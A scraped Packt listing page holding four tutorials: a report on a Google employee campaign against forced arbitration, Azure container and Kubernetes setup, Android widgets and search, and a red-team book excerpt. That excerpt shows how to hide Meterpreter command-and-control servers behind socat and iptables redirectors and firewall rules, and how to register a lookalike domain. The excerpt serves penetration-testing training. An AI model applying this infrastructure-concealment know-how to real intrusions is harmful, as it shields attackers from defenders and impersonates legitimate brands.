Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7008 Articles
article-image-googlers-launch-industry-wide-awareness-campaign-to-fight-against-forced-arbitration
Natasha Mathur
17 Jan 2019
6 min read
Save for later

Googlers launch industry-wide awareness campaign to fight against forced arbitration

Natasha Mathur
17 Jan 2019
6 min read
A group of Googlers launched a public awareness social media campaign from 9 AM to 6 PM EST yesterday. The group, called, ‘Googlers for ending forced arbitration’ shared information about arbitration on their Twitter and Instagram accounts throughout the day. https://twitter.com/endforcedarb/status/1084813222505410560 The group tweeted out yesterday, as part of the campaign, that in surveying employees of 30+ tech companies and 10+ common Temp/Contractor suppliers in the industry, none of them could meet the three primary criteria needed for a transparent workplace. The three basic criteria include: optional arbitration policy for all employees and for all forms of discrimination (including contractors/temps), no class action waivers, and no gag rule that keeps arbitration hearings proceedings confidential. The group shared some hard facts about Arbitration and also busted myths regarding the same. Let’s have a look at some of the key highlights from yesterday’s campaign. At least 60 million Americans are forced to use arbitration The group states that the implementation of forced arbitration policy has grown significantly in the past seven years. Over 65% of the companies consisting of 1,000 or more employees, now have mandatory arbitration procedures. Employees don’t have an option to take their employers to court in cases of harassment or discrimination. People of colour and women are often the ones who get affected the most by this practice.           How employers use forced Arbitration Forced arbitration is extremely unfair Arbitration firms that are hired by the companies usually always favour the companies over its employees. This is due to the fear of being rejected the next time by an employer lest the arbitration firm decides to favour the employee. The group states that employees are 1.7 times more likely to win in Federal courts and 2.6 times more likely to win in state courts than in arbitration.   There are no public filings of the complaint details, meaning that the company won’t have anyone to answer to regarding the issues within the organization. The company can also limit its obligation when it comes to disclosing the evidence that you need to prove your case.   Arbitration hearings happen behind closed doors within a company When it comes to arbitration hearings, it's just an employee and their lawyer, other party and their lawyer, along with a panel of one to three arbitrators. Each party gets to pick one arbitrator each, who is also hired by your employers. However, there’s usually only a single arbitrator panel involved as three-arbitrator panel costs five times more than a single arbitrator panel, as per the American Arbitration Association. Forced Arbitration requires employees to sign away their right to class action lawsuits at the start of the employment itself The group states that irrespective of having legal disputes or not, forced arbitration bans employees from coming together as a group in case of arbitration as well as in case of class action lawsuits. Most employers also practice “gag rule” which restricts the employee to even talk about their experience with the arbitration policy. There are certain companies that do give you an option to opt out of forced arbitration using an opt-out form but comes with a time constraint depending on your agreement with that company. For instance, companies such as Twitter, Facebook, and Adecco give their employees a chance to opt out of forced arbitration.                                                  Arbitration opt-out option JAMS and AAA are among the top arbitration organizations used by major tech giants JAMS, Judicial Arbitration and Mediation Services, is a private company that is used by employers like Google, Airbnb, Uber, Tesla, and VMware. JAMS does not publicly disclose the diversity of its arbitrators. Similarly, AAA, America Arbitration Association, is a non-profit organization where usually retired judges or lawyers serve as arbitrators. Arbitrators in AAA have an overall composition of 24% women and minorities. AAA is one of the largest arbitration organizations used by companies such as Facebook, Lyft, Oracle, Samsung, and Two Sigma.   Katherine Stone, a professor from UCLA law school, states that the procedure followed by these arbitration firms don’t allow much discovery. What this means is that these firms don’t usually permit depositions or various kinds of document exchange before the hearing. “So, the worker goes into the hearing...armed with nothing, other than their own individual grievances, their own individual complaints, and their own individual experience. They can’t learn about the experience of others,” says Stone. Female workers and African-American workers are most likely to suffer from forced arbitration 58% female workers and 59% African American workers face mandatory arbitration depending on the workgroups. For instance, in the construction industry, which is a highly male-dominated industry, the imposition of forced arbitration is at the lowest rate. But, in the education and health industries, which has the majority of the female workforce, the imposition rate of forced arbitration is high.                                 Forced Arbitration rate among different workgroups Supreme Court has gradually allowed companies to expand arbitration to employees & consumers The group states that the 1925 Federal Arbitration Act (FAA) had legalized arbitration between shipping companies in cases of settling commercial disputes. The supreme court, however, expanded this practice of arbitration to companies too.                                                   Supreme court decisions Apart from sharing these facts, the group also shed insight on dos and don’t that employees should follow under forced arbitration clauses.                                                      Dos and Dont’s The social media campaign by Googlers for forced arbitration represents an upsurge in the strength and courage among the employees within the tech industry as not just the Google employees but also employees from different tech companies shared their experience regarding forced arbitration. The group had researched academic institutions, labour attorneys, advocacy groups, etc, and the contracts of around 30 major tech companies, as a part of the campaign. To follow all the highlights from the campaign, follow the End Forced Arbitration Twitter account. Shareholders sue Alphabet’s board members for protecting senior execs accused of sexual harassment Recode Decode #GoogleWalkout interview shows why data and evidence don’t always lead to right decisions in even the world’s most data-driven company Tech Workers Coalition volunteers talk unionization and solidarity in Silicon Valley
Read more
  • 0
  • 0
  • 15985

article-image-obfuscating-command-and-control-c2-servers-securely-with-redirectors-tutorial
Amrata Joshi
16 Jan 2019
11 min read
Save for later

Obfuscating Command and Control (C2) servers securely with Redirectors [Tutorial]

Amrata Joshi
16 Jan 2019
11 min read
A redirector server is responsible for redirecting all the communication to the C2 server. Let's explore the basics of redirector using a simple example. Take a scenario in which we have already configured our team server and we're waiting for an incoming Meterpreter connection on port 8080/tcp. Here, the payload is delivered to the target and has been executed successfully. This article is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book covers advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of redirectors, the process of obfuscating C2 securely, domain fronting and much more. To follow are the things that will happen next: On payload execution, the target server will try to connect to our C2 on port 8080/tcp. Upon successful connection, our C2 will send the second stage as follows: A Meterpreter session will then open and we can access this using Armitage: However, the target server's connection table will have our C2s IP in it. This means that the monitoring team can easily get our C2 IP and block it: Here's the current situation. This is displayed in an architectural format in order to aid understanding: To protect our C2 from being burned, we need to add a redirector in front of our C2. Refer to the following image for a clear understanding of this process: This is currently the IP information of our redirector and C2: Redirector IP: 35.153.183.204 C2 IP: 54.166.109.171 Assuming that socat is installed on the redirector server, we will execute the following command to forward all the communications on the incoming port 8080/tcp to our C2: Our redirector is now ready. Now let's generate a one-liner payload with a small change. This time, the lhost will be set to the redirector IP instead of the C2: Upon execution of the payload, the connection will initiate from the target server and the server will try to connect with the redirector: We might now notice something different about the following image as the source IP is redirector instead of the target server: Let's take a look at the connection table of the target server: The connection table doesn't have our C2 IP and neither does the Blue team. Now the redirector is working perfectly, what could be the issue with this C2-redirector setup? Let's perform a port scan on the C2 to check the available open ports: As we can see from the preceding screenshot, port 8080/tcp is open on our C2. This means that anyone can try to connect to our listener in order to confirm its existence. To avoid situations like this, we should configure our C2 in such a way that allows us to protect it from outside reconnaissance (recon) and attacks. Obfuscating C2 securely To put it in a diagrammatic format, our current C2 configuration is this: If someone tries to connect to our C2 server, they will be able to detect that our C2 server is running a Meterpreter handler on port 8080/tcp: To protect our C2 server from outside scanning and recon, let's set the following Uncomplicated Firewall (UFW) ruleset so that only our redirector can connect to our C2. To begin, execute the following UFW commands to add firewall rules for C2: sudo ufw allow 22 sudo ufw allow 55553 sudo ufw allow from 35.153.183.204 to any port 8080 proto tcp sudo ufw allow out to 35.153.183.204 port 8080 proto tcp sudo ufw deny out to any The given commands needs to be executed and the result is shown in the following screenshot: In addition, execute the following ufw commands to add firewall rules for redirector as well: sudo ufw allow 22 sudo ufw allow 8080 The given commands needs to be executed and the result is shown in the following screenshot: Once the ruleset is in place, this can be described as follows: If we try to perform a port scan on the C2 now, the ports will be shown as filtered: as shown below. Furthermore, our C2 is only accessible from our redirector now. Let's also confirm this by doing a port scan on our C2 from redirector server: Short-term and long-term redirectors Short-term (ST)—also called short haul—C2 are those C2 servers on which the beaconing process will continue. Whenever a system in the targeted organization executes our payload, the server will connect with the ST-C2 server. The payload will periodically poll for tasks from our C2 server, meaning that the target will call back to the ST-C2 server every few seconds. The redirector placed in front of our ST-C2 server is called the short-term (ST) redirector. This is responsible for handling ST-C2 server connections on which the ST-C2 will be used for executing commands on the target server in real time. ST and LT redirectors would get caught easily during the course of engagement because they're placed at the front. Long-term (LT)—also known as long-haul—C2 server is where the callbacks received from the target server will be after every few hours or days. The redirector placed in front of our LT-C2 server is called a long-term (LT) redirector. This redirector is used to maintain access for a longer period of time than ST redirectors. When performing persistence via the ST-C2 server, we need to provide the domain of our LT redirector so that the persistence module running on the target server will connect back to the LT redirector instead of the ST redirector. A segregated red team infrastructure setup would look something like this: Source: https://payatu.com/wp-content/uploads/2018/08/redteam_infra.png Once we have a proper red team infrastructure setup, we can focus on the kind of redirection we want to have in our ST and LT redirectors. Redirection methods There are two ways in which we can perform redirection: Dumb pipe redirection Filtration/smart redirection Dumb pipe redirection The dumb pipe redirectors blindly forward the network traffic from the target server to our C2, or vice-versa. This type of redirector is useful for quick configuration and setup, but they lack a level of control over the incoming traffic. Dumb pipe redirection will obfuscate (hide) the real IP of our C2, but won't it distract the defenders of the organization from investigating our setup. We can perform dumb pipe redirection using socat or iptables. In both cases, the network traffic will be redirected either to our ST-C2 server or LT-C2 server. Source: https://payatu.com/wp-content/uploads/2018/08/dumb_pipe_redirection123.png Let's execute the command given in the following image in order to configure a dumb pipe redirector which would redirect to our C2 on port 8080/tcp: Following are the commands that we can execute to perform dumb pipe redirection using iptables: iptables -I INPUT -p tcp -m tcp --dport 8080 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 54.166.109.171:8080 iptables -t nat -A POSTROUTING -j MASQUERADE iptables -I FORWARD -j ACCEPT iptables -P FORWARD ACCEPT sysctl net.ipv4.ip_forward=1 The given commands needs to be executed and the result is shown in the following screenshot: (Ignore the sudo error here. This has occurred because of the hostname that we changed) Using socat or iptables, the result would be same i.e. the network traffic on the redirector's interface will be forwarded to our C2. Filtration/smart redirection Filtration redirection, also known as smart redirection, doesn't just blindly forward the network traffic to the C2. Smart redirection will always process the network traffic based on the rules defined by the red team before forwarding it to the C2. In a smart redirection, if the C2 traffic is invalid, the network traffic will either be forwarded to a legitimate website or it would just drop the packets. Only if the network traffic is for our C2 will the redirection work accordingly: To configure a smart redirection, we need to install a web service and configure it. Let's install Apache server on the redirector using the sudo apt install apache2 command: We need to execute the following commands as well in order to enable Apache modules to be rewritten, and also to enable SSL: sudo apt-get install apache2 sudo a2enmod ssl rewrite proxy proxy_http sudo a2ensite default-ssl.conf sudo service apache2 restart These are all commands that needs to be executed. The result of the executed commands are shown in the following screenshot: We also need to configure the Apache from its configuration: We need to look for the Directory directive in order to change the AllowOverride from None to All so that we can use our custom .htaccess file for web request filtration. We can now set up the virtual host setting and add this to wwwpacktpub.tk (/etc/apache2/sites-enabled/default-ssl.conf): After this, we can generate the payload with a domain such as wwwpacktpub.tk in order to get a connection. Domain fronting According to https://resources.infosecinstitute.com/domain-fronting/: Domain fronting is a technique that is designed to circumvent the censorship employed for certain domains (censorship may occur for domains that are not in line with a company's policies, or they may be a result of the bad reputation of a domain). Domain fronting works at the HTTPS layer and uses different domain names at different layers of the request (more on this later). To the censors, it looks like the communication is happening between the client and a permitted domain. However, in reality, communication might be happening between the client and a blocked domain. To make a start with domain fronting, we need to get a domain that is similar to our target organization. To check for domains, we can use the domainhunter tool. Let's clone the repository to continue: We need to install some required Python packages before continuing further. This can be achieved by executing the pip install -r requirements.txt command as follows: After installation, we can run the tool by executing the python domainhunter.py command as follows: By default, this will fetch for the expired and deleted domains that have a blank name because we didn't provide one: Let's check for the help option to see how we can use domainhunter: Let's search for a keyword to look for the domains related to the specified keyword. In this case, we will use packtpub as the desired keyword: We just found out that wwwpacktpub.com is available. Let's confirm its availability at domain searching websites as follows: This confirms that the domain is available on name.com and even on dot.tk for almost $8.50: Let's see if we can find a free domain with a different TLD: We have found that the preceding-mentioned domains are free to register. Let's select wwwpacktpub.tk as follows: We can again check the availability of www.packtpub.tk and obtain this domain for free: In the preceding setting, we need to set our redirector's IP address in the Use DNS field: Let's review the purchase and then check out: Our order has now been confirmed. We just obtained wwwpacktpub.tk: Let's execute the dig command to confirm our ownership of this: The dig command resolves wwwpacktpub.tk to our redirector's IP. Now that we have obtained this, we can set the domain in the stager creation and get the back connection from wwwpacktpub.tk: In this article, we have learned the basics of redirectors and we have also covered how we can obfuscate C2s in a secure manner so that we can protect our C2s from getting detected by the Blue team.  This article also covered short-term and long-term C2s and much more. To know more about advanced penetration testing tools and more check out the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. Introducing numpywren, a system for linear algebra built on a serverless architecture Fortnite server suffered a minor outage, Epic Games was quick to address the issue Windows Server 2019 comes with security, storage and other changes
Read more
  • 0
  • 0
  • 26388

article-image-implementing-azure-managed-kubernetes-and-azure-container-service-tutorial
Melisha Dsouza
15 Jan 2019
12 min read
Save for later

Implementing Azure-Managed Kubernetes and Azure Container Service [Tutorial]

Melisha Dsouza
15 Jan 2019
12 min read
The next level of virtualization is containers as they provide a better solution than virtual machines within Hyper-V, as containers optimize resources by sharing as much as possible of the existing container platform. Azure Kubernetes Service (AKS) simplifies the deployment and operations of Kubernetes and enables users to dynamically scale their application infrastructure with agility; along with simplifying cluster maintenance with automated upgrades and scaling. Azure Container Service (ACS) simplifies the management of Docker clusters for running containerized applications This tutorial will combine the above-defined concepts and describe how to design and implement containers, and how to choose the proper solution for orchestrating containers. You will get an overview of how Azure can help you to implement services based on containers and get rid of traditional virtualization stuff with redundant OS resources that need to be managed, updated, backed-up, and optimized. To run containers in a cloud environment, no specific installations are required, as you only need the following: A computer with an internet browser An Azure subscription (if not available, a trial could work too). With Azure, you will have the option to order a container directly in Azure as an Azure Container Instance (ACI) or a managed Azure solution using Kubernetes as orchestrator. This tutorial is an excerpt from a book written by Florian Klaffenbach et al. titled  Implementing Azure Solutions - Second Edition. This book will get you up and running with Azure services and teach you how to implement them in your organization. All of the code for this tutorial can be found at GitHub. Azure Container Registry (ACR) If you need to set up a container environment to be used by the developers in your Azure tenant, you will have to think about where to store your container images. In general, the way to do this is to provide a container registry. This registry could reside on a VM itself, but using PaaS services with cloud technologies always provides an easier and more flexible design. This is where Azure Container Service (ACS) comes in, as it is a PaaS solution that provides high flexibility and even features such as replication between geographies. This means you will need to fill in the following details: When you create your container registry, you will need to define the following: The registry name (ending with azurecr.io) The resource group the registry sits in The Azure location The admin user (if you will need to log in to the registry using an account) The SKU: Basic Standard Premium The following table details the features and limits of the basic, standard, and premium service tiers: Resource Basic Standard Premium Storage 10 GiB 100 GiB 500 GiB Max image layer size 20 GiB 20 GiB 50 GiB ReadOps per minute 1,000 3,000 10,000 WriteOps per minute 100 500 2,000 Download bandwidth MBps 30 60 100 Upload bandwidth MBps 10 20 50 Webhooks 2 10 100 Geo-replication N/A N/A Supported  Switching between the different SKUs is supported and can be done using the portal, PowerShell, or CLI. If you still are on a classic ACR, the first step would be to upgrade to a managed registry. Azure Container Instances By running your workloads in ACI, you don't have to set up a management infrastructure for your containers, you just can put your focus on design and building the applications. Creating your first container in Azure Let's create a first simple container in Azure using the portal:  Go to Container Instances under New | Marketplace | Everything, as shown in the following screenshot: After having chosen the Container Instances entry in the resources list, you will have to define some properties like: We will need to define the Azure container name. Of course, this needs to be unique in your environment. Then, we will need to define the source of the image and to which resource group and region it should be deployed within Azure. As already mentioned, containers can reside on Windows and Linux, because this needs to be defined at first. Afterwards, we will need to define the resources per container: Cores Memory Ports Port protocol Restart policy (if the container went offline) After having deployed the corresponding container registry, we can start working with the container instance: When hitting the URL posted in the left part, under FQDN, you should see the following screenshot: After we have finalized the preceding steps, we have an ACI up and running, which means that you are able to provide container images, load them up to Azure, and run them. Azure Marketplace containers In the public Azure Marketplace, you can find existing container images that just can be deployed to your subscription. These are pre-packaged images that give you the option to start with your first container in Azure. As cloud services provide reusability and standardization, this entry point is always good to look at first. Before starting with this, we will need to check if the required resource providers are enabled on the subscription you are working with. Otherwise, we will need to register them by hitting the Register entry and waiting a few minutes for completion, as shown in the following screenshot: Now, we can start deploying marketplace containers such as the container image for WordPress, which is used as a sample, as shown in the following screenshot: At first, we will need to decide on the corresponding image and choose to create a new ACR, or use an existing one. Furthermore, the Azure region, the resource group, and the tag (for example, version) need to be defined in the following dialog: Now that the registry is being created, we will need to update the permission settings, also called enable admin registry. This can be done with the Admin user Enable button as shown in the following screenshot:  Regarding the SKU, this is just another point where we can set the priority and define performance. This may take some minutes to be enabled. Now, we can start deploying container images from the container registry, as you can see in the following screenshot with the WordPress image that is already available in the registry: At first, we will need to choose the corresponding container from the registry; right-click the tag version from the Tags section: Having done that, we will need to hit the Deploy to web app menu entry to deploy the web app to Azure: As the properties that need to be filled are some defaults for Web Apps, it is quite easy to set them: Finally, the first containerized image for a web app has been deployed to Azure. Container orchestration One of the most interesting topics with regard to containers is that they provide technology for scaling. For example, if we need more performance on a website that is running containerized, we would just spin off an additional container to load-balance the traffic. This could even be done if we needed to scale down. The concept of container orchestration Regarding this technology, we need an orchestration tool to provide this feature set. There are some well-known container orchestration tools available on the market, such as the following: Docker swarm DC/OS Kubernetes Kubernetes is the most-used one, and therefore could be deployed as a service in most public cloud services, such as in Azure. It provides the following features: Automated container placement: On the container hosts, to best spread the load between them Self-healing: For failed containers, restarting them in a proper way Horizontal scaling: Automated horizontal scaling (up and down) based on the existing load Service discovery and load balancing: By providing IP-addresses to containers and managing DNS registrations Rollout and rollback: Automated rollout and rollback for containers, which provides another self-healing feature as updated containers that are newly rolled-out are just rolled back if something goes wrong Configuration management: By updating secrets and configurations without the need to fully rebuild the container itself Azure Kubernetes Service (AKS) Installing, maintaining, and administering a Kubernetes cluster manually could mean a huge investment of time for a company. In general, these tasks are one-off costs and therefore it would be best to not waste these resources. In Azure today, there is a feature called AKS, where K emphasizes that it is a managed Kubernetes service. For AKS, there is no charge for Kubernetes masters, you just have to pay for the nodes that are running the containers. Before you start, you will have to fulfill the following prerequisites: An Azure account with an active subscription Azure CLI installed and configured Kubernetes command-line tool, kubectl, installed Make sure that the Azure subscription you use has these required resources—storage, compute, networking, and a container service: For the first step, you need to choose Kubernetes service and choose to create your AKS deployment for your tenant. The following parameters need to be defined: Resource group for the deployment Kubernetes cluster name Azure region Kubernetes version DNS prefix Then,  hit the Authentication tab, as shown in the following screenshot: On the Authentication tab, you will need to define a service principal or choose and existing one, as AKS needs a service principal to run the deployment. In addition, you could enable the RBAC feature, which gives you the chance to define fine-grained permissions based on Azure AD accounts and groups. On the Networking tab, you can choose either to add the Kubernetes cluster into an existing VNET, or create a new one. In addition, the HTTP routing feature can be enabled or disabled: On the Monitoring tab, you have the option to enable container monitoring and link it to an existing Log Analytics workspace, or create a new one: The following is the source from which to set your required tags: Finally, the validation will check for any misconfigurations and create the Azure ARM template for the deployment. Clicking the Create button will start the deployment phase, which could run for several minutes or even longer depending on the chosen feature, and scale: After the deployment has finished, the Kubernetes dashboard is available. You can view the Kubernetes dashboard by clicking on the View Kubernetes dashboard link, as shown in the following screenshot: The dashboard looks something like the one shown in the following screenshot: As you can see in the preceding screenshot, there are four steps to open the dashboard. At first, we will need to install the Azure CLI in its most current version using the statement that is mentioned in the following screenshot: Afterward, the AKS CLI needs to be enabled. It is called kubectl.exe. Finally, after setting all the parameters (and when you have performed steps 3 and 4 from the preceding task list), the following dashboard should open in a new browser window: The preceding dashboard provides a way to monitor and administer your Azure Kubernetes environment, in general, from a GUI. If a new Kubernetes version becomes available, you can easily update it from the Azure portal yourself with one click, as shown in the following screenshot: If you need to scale your AKS hosts, this is quite easy too, as you can do it through the Azure portal. A maximum of 100 hosts with 3 vCPUs and 10.5 GB RAM per host is currently possible: You can now upload your containers to your AKS-enabled Docker and have a huge scalable infrastructure with a minimum of administrative tasks and time for the implementation itself. If you need to monitor AKS, the integration with Azure monitoring is integrated completely. By clicking the Monitor container health link, you will be directed to the following overview: The Nodes tab provides the following information per node: This not only gives a brief overview of the health status but also the number of containers and the load on the node itself. The Controllers view provides detailed information on the AKS controller, its services, status, and uptime: And finally, the Containers tab gives a deep overview of the health state of each container running in the infrastructure (system containers included): By hitting the Search logs section, you can define your own custom Azure monitoring searches and integrate them in your custom portal: To get everything up-and-running, the following to-do list gives a brief overview of all the tasks needed to provide an app within AKS: Prepare the AKS App: Create the container registry: Create the Kubernetes cluster Run the application in AKS: Scale the application in AKS: Update the application in AKS: AKS has the following service quotas and limits: Resource Default limit Max nodes per cluster 100 Max pods per node (basic networking with KubeNet) 110 Max pods per node (advanced networking with Azure CNI) 301 Max clusters per subscription 100 As you have seen, AKS in Azure provides great features with a minimum of administrative tasks. Summary In this tutorial, we learned the basics required to understand, deploy, and manage container services in a public cloud environment. Basically, the concept of containers is a great idea and surely the next step in virtualization that applications need to go to. Setting up the environment manually is quite complex, but by using the PaaS approach, the setup procedure is quite simple (because of automation) and allows you to just start using it. To understand how to build robust cloud solutions on Azure, check out our book Implementing Azure Solutions - Second Edition  Microsoft Connect(); 2018 Azure updates: Azure Pipelines extension for Visual Studio Code, GitHub releases and much more! Introducing Grafana’s ‘Loki’ (alpha), a scalable HA multi-tenant log aggregator for cloud natives; optimized for Grafana, Prometheus and Kubernetes DigitalOcean launches its Kubernetes-as-a-service at KubeCon+CloudNativeCon to ease running containerized app
Read more
  • 0
  • 0
  • 23618

article-image-implementing-a-home-screen-widget-and-search-bar-on-android-tutorial
Natasha Mathur
14 Jan 2019
12 min read
Save for later

Implementing a home screen widget and search bar on Android [Tutorial]

Natasha Mathur
14 Jan 2019
12 min read
In this tutorial, we'll look at how to create a home screen App Widget using which users can add your app on their Home screen. We'll also explore adding a Search option to the Action Bar using the Android SearchManager API. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores techniques and knowledge of graphics, animations, media, etc, to help you develop applications using the latest Android framework. Creating a Home screen widget Before we dig into the code for creating an App Widget, let's cover the basics. There are three required and one optional component: The AppWidgetProviderInfo file: It's an XML resource. The AppWidgetProvider class: This is a Java class. The View layout file: It's a standard layout XML file, with some restrictions. The App Widget configuration Activity (optional): This is an Activity the OS will launch when placing the widget to provide configuration options. The AppWidgetProvider must also be declared in the AndroidManifest file. Since AppWidgetProvider is a helper class based on the Broadcast Receiver, it is declared in the manifest with the <receiver> element. Here is an example manifest entry: The metadata points to the AppWidgetProviderInfo file, which is placed in the res/xml directory. Here is a sample AppWidgetProviderInfo.xml file: The following is a brief overview of the available attributes: minWidth: The default width when placed on the Home screen minHeight: The default height when placed on the Home screen updatePeriodMillis: It's part of the onUpdate() polling interval (in milliseconds) initialLayout: The AppWidget layout previewImage (optional): The image shown when browsing App Widgets configure (optional): The activity to launch for configuration settings resizeMode (optional): The flags indicate resizing options: horizontal, vertical, none minResizeWidth (optional): The minimum width allowed when resizing minResizeHeight (optional): The minimum height allowed when resizing widgetCategory (optional): Android 5+ only supports Home screen widgets The AppWidgetProvider extends the BroadcastReceiver class, which is why the <receiver> element is used when declaring the AppWidget in the Manifest. As it's BroadcastReceiver, the class still receives OS broadcast events, but the helper class filters those events down to those applicable for an App Widget. The AppWidgetProvider class exposes the following methods: onUpdate(): It's called when initially created and at the interval specified. onAppWidgetOptionsChanged(): It's called when initially created and any time the size changes. onDeleted(): It's called any time a widget is removed. onEnabled(): It's called the first time a widget is placed (it isn't called when adding second and subsequent widgets). onDisabled(): It's called when the last widget is removed. onReceive(): It's called on every event received, including the preceding event. Usually not overridden as the default implementation only sends applicable events. The last required component is the layout. An App Widget uses a Remote View, which only supports a subset of the available layouts: AdapterViewFlipper FrameLayout GridLayout GridView LinearLayout ListView RelativeLayout StackView ViewFlipper And it supports the following widgets: AnalogClock Button Chronometer ImageButton ImageView ProgressBar TextClock TextView With App Widget basics covered, it's now time to start coding. Our example will cover the basics so you can expand the functionality as needed. This recipe uses a View with a clock, which, when pressed, opens our activity. The following screenshot shows the widget in the widget list when adding it to the Home screen: The purpose of the image is to show how to add a widget to the home screen The widget list's appearance varies by the launcher used. Here's a screenshot showing the widget after it is added to the Home screen: Getting ready Create a new project in Android Studio and call it AppWidget. Use the default Phone & Tablet options and select the Empty Activity option when prompted for the Activity Type. How to do it... We'll start by creating the widget layout, which resides in the standard layout resource directory. Then, we'll create the XML resource directory to store the AppWidgetProviderInfo file. We'll add a new Java class and extend AppWidgetProvider, which handles the onUpdate() call for the widget. With the receiver created, we can then add it to the Android Manifest. Here are the detailed steps: Create a new file in res/layout called widget.xml using the following XML: Create a new directory called XML in the resource directory. The final result will be res/xml. Create a new file in res/xml called appwidget_info.xml using the following XML: If you cannot see the new XML directory, switch from Android view to Project view in the Project panel drop-down. Create a new Java class called HomescreenWidgetProvider, extending from AppWidgetProvider. Add the following onUpdate() method to the HomescreenWidgetProvider class: Add the HomescreenWidgetProvider to the AndroidManifest using the following XML declaration within the <application> element: Run the program on a device or emulator. After first running the application, the widget will then be available to add to the Home screen. How it works... Our first step is to create the layout file for the widget. This is a standard layout resource with the restrictions based on the App Widget being a Remote View, as discussed in the recipe introduction. Although our example uses an Analog Clock widget, this is where you'd want to expand the functionality based on your application needs. The XML resource directory serves to store the AppWidgetProviderInfo, which defines the default widget settings. The configuration settings determine how the widget is displayed when initially browsing the available widgets. We use very basic settings for this recipe, but they can easily be expanded to include additional features, such as a preview image to show a functioning widget and sizing options. The updatePeriodMillis attribute sets the update frequency. Since the update will wake up the device, it's a trade-off between having up-to-date data and battery life. (This is where the optional Settings Activity is useful by letting the user decide.) The AppWidgetProvider class is where we handle the onUpdate() event triggered by the updatePeriodMillis polling. Our example doesn't need any updating so we set the polling to zero. The update is still called when initially placing the widget. onUpdate() is where we set the pending intent to open our app when the clock is pressed. Since the onUpdate() method is probably the most complicated aspect of AppWidgets, we'll explain this in some detail. First, it's worth noting that onUpdate() will occur only once each polling interval for all the widgets is created by this provider. (All additional widgets created will use the same cycle as the first widget created.) This explains the for loop, as we need it to iterate through all the existing widgets. This is where we create a pending intent, which calls our app when the clock widget is pressed. As discussed earlier, an AppWidget is a Remote View. Therefore, to get the layout, we call RemoteViews() with our fully qualified package name and the layout ID. Once we have the layout, we can attach the pending intent to the clock view using setOnClickPendingIntent(). We call the AppWidgetManager named updateAppWidget() to initiate the changes we made. The last step to make all this work is to declare the widget in the Android Manifest. We identify the action we want to handle with the <intent-filter>. Most App Widgets will likely want to handle the Update event, as ours does. The other item to note in the declaration is the following line: This tells the system where to find our configuration file. Adding Search to the Action Bar Along with the Action Bar, Android 3.0 introduced the SearchView widget, which can be included as a menu item when creating a menu. This is now the recommended UI pattern to provide a consistent user experience. The following screenshot shows the initial appearance of the Search icon in the Action Bar: The following screenshot shows how the Search option expands when pressed: If you want to add Search functionality to your application, this recipe will walk you through the steps to set up your User Interface and properly configure the Search Manager API. Getting ready Create a new project in Android Studio and call it SearchView. Use the default Phone & Tablet options and select Empty Activity when prompted for the Activity Type. How to do it... To set up the Search UI pattern, we need to create the Search menu item and a resource called searchable. We'll create a second activity to receive the search query. Then, we'll hook it all up in the AndroidManifest file. To get started, open the strings.xml file in res/values and follow these steps: Add the following string resources: Create the menu directory: res/menu. Create a new menu resource called menu_search.xml in res/menu using the following XML: Open ActivityMain and add the following onCreateOptionsMenu() to inflate the menu and set up the Search Manager: @Override public boolean onCreateOptionsMenu(Menu menu) { MenuInflater inflater = getMenuInflater(); inflater.inflate(R.menu.menu_search, menu); SearchManager searchManager = (SearchManager) getSystemService(Context.SEARCH_SERVICE); MenuItem searchItem = menu.findItem(R.id.menu_search); SearchView searchView = (SearchView) searchItem.getActionView(); searchView.setSearchableInfo(searchManager.getSearchableInfo(getComponentName())); return true; } Create a new XML resource directory: res/xml. Create a new file in res/xml called searchable.xml using the following XML: Create a new layout called activity_search_result.xml using this XML: Add a new Empty Activity to the project called SearchResultActivity. Add the following variable to the class: TextView mTextViewSearchResult; Change onCreate() to load our layout, set the TextView, and check for the QUERY action: Add the following method to handle the search: With the User Interface and code now complete, we just need to hook everything up correctly in the AndroidManifest. Here is the complete manifest, including both activities: Run the application on a device or emulator. Type in a search query and hit the Search button (or press Enter). The SearchResultActivity will be displayed, showing the search query entered. How it works... Since the New Project Wizard uses the AppCompat library, our example uses the support library API. Using the support library provides the greatest device compatibility as it allows the use of modern features (such as the Action Bar) on older versions of the Android OS. We start by creating string resources for the Search View.  In step 3, we create the menu resource, as we've done many times. One difference is that we use the app namespace for the showAsAction and actionViewClass attributes. The earlier versions of the Android OS don't include these attributes in the Android namespace, which is why we create an app namespace. This serves as a way to bring new functionality to older versions of the Android OS. In step 4, we set up the SearchManager, using the support library APIs. Step 6 is where we define the searchable XML resource, which is used by the SearchManager. The only required attribute is the label, but a hint is recommended so the user will have an idea of what they should type in the field. The android:label must match the application name or the activity name and must use a string resource (as it does not work with a hardcoded string). Steps 7-11 are for the SearchResultActivity. Calling the second activity is not a requirement of the SearchManager, but is commonly done to provide a single activity for all searches initiated in your application. If you run the application at this point, you would see the search icon, but nothing would work. Step 12 is where we put it all together in the AndroidManifest file. The first item to note is the following: Notice this is in the <application> element and not in either of the <activity> elements. By defining it at the <application> level, it will automatically apply to all <activities>. If we moved it to the MainActivity element, it would behave exactly the same in our example. You can define styles for your application in the <application> node and still override individual activity styles in the <activity> node. We specify the searchable resource in the SearchResultActivity <meta-data> element: We also need to set the intent filter for SearchResultActivity as we do here: The SearchManager broadcasts the SEARCH intent when the user initiates the search. This declaration directs the intent to the SearchResultActivity activity. Once the search is triggered, the query text is sent to the SearchResultActivity using the SEARCH intent. We check for the SEARCH intent in the onCreate() and extract the query string using the following code: You now have the Search UI pattern fully implemented. With the UI pattern complete, what you do with the search results is specific to your application needs. Depending on your application, you might search a local database or maybe a web service. So, we discussed creating a shortcut on the Home screen, creating a Home screen widget and adding Search to the Action Bar. Be sure to check out the book 'Android 9 Development Cookbook - Third Edition', if you're interested in learning how to show your app in full-screen and enable lock screen shortcuts. Build your first Android app with 